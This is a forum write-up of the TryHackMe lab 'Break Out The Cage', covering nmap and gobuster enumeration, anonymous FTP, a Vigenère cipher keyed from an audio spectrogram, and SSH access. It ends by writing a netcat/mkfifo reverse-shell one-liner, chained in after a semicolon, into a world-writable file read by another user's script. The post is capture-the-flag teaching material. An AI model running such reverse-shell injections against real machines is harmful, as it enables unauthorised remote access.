[EN] TryHackMe Break Out The Cage WriteUp

PwnLab.Me

Admin
Katılım
21 Ocak 2024
Mesajlar
202
Tepkime puanı
9
Puanları
18
Çağrı Ali Ceylan tarafından yazılmıştır.

[EN] Break Out The Cage WriteUp​


Hello everyone, in this article, we will be solving the room named “Break Out The Cage” in TryHackMe together. Let’s get started right away.

Room’s Link: https://tryhackme.com/room/breakoutthecage1

Information Gathering​


First of all, let’s scan the ip address given to us with nmap.

sudo nmap -A 10.10.7.223
nmap

nmap

We have 4 ports open, at the same time we see that we can log in anonymously via FTP. Let’s try.

After connecting to FTP anonymously with the help of Filezilla, we find a file called dad_tasks. Let’s download.

filezilla

filezilla

When we open the file, we see a text encrypted with base64, when we decode it, we see a text like the one below.

Qapw Eekcl – Pvr RMKP…XZW VWUR… TTI XEF… LAA ZRGQRO!!!!
Sfw. Kajnmb xsi owuowge
Faz. Tml fkfr qgseik ag oqeibx
Eljwx. Xil bqi aiklbywqe
Rsfv. Zwel vvm imel sumebt lqwdsfk
Yejr. Tqenl Vsw svnt “urqsjetpwbn einyjamu” wf.

Iz glww A ykftef…. Qjhsvbouuoexcmvwkwwatfllxughhbbcmydizwlkbsidiuscwl

This text is encrypted with “vignere cipher”, to decrypt it first we need a key.

When looking at the open ports, we saw that port 80 was open, so a website is up. Let’s scan the directories with Gobuster.

gobuster

gobuster

When we dig through the directories a little bit, we find the directory named “auditions”, there is an audio file in it. When we open the audio file, we encounter a parasitic speech. Thinking that something is hidden inside, we open it with AudoCity and look at the spectrogram, and we reach the key of the vignere cipher.

audacity

audocity

After deciphering the password with the key, we reach our new text, it contains the password of the weston user we need.

Dads Tasks – The RAGE…THE CAGE… THE MAN… THE LEGEND!!!!
One. Revamp the website
Two. Put more quotes in script
Three. Buy bee pesticide
Four. Help him with acting lessons
Five. Teach Dad what “information security” is.

In case I forget…. *************************************************

Action Time!​


We log in to SSH as the user named “weston” with the above password.


Now that we’re logged in, let’s look for the files belonging to cage.

find / -user cage 2> /dev/null

The file “/opt/.dads_scripts/spread_the_quotes.py” caught my attention, let’s take a look at its contents. It has a python script in it, and when I look at its permissions, I see that everyone has the authority to change the file, which is ideal for adding a reverse shell.

terminal1

terminal1

With this command, we added our reverse shell to the quotes file.

cd /opt/.dads_scripts/.files

echo “asd; rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.8.52.178 1212 >/tmp/f” > .quotes

And we are in! Let’s read the user flag.

cat Super_Duper_Checklist
user.txt

user.txt

Stay tuned for more content!
 
Moderatör tarafında düzenlendi:
Geri
Üst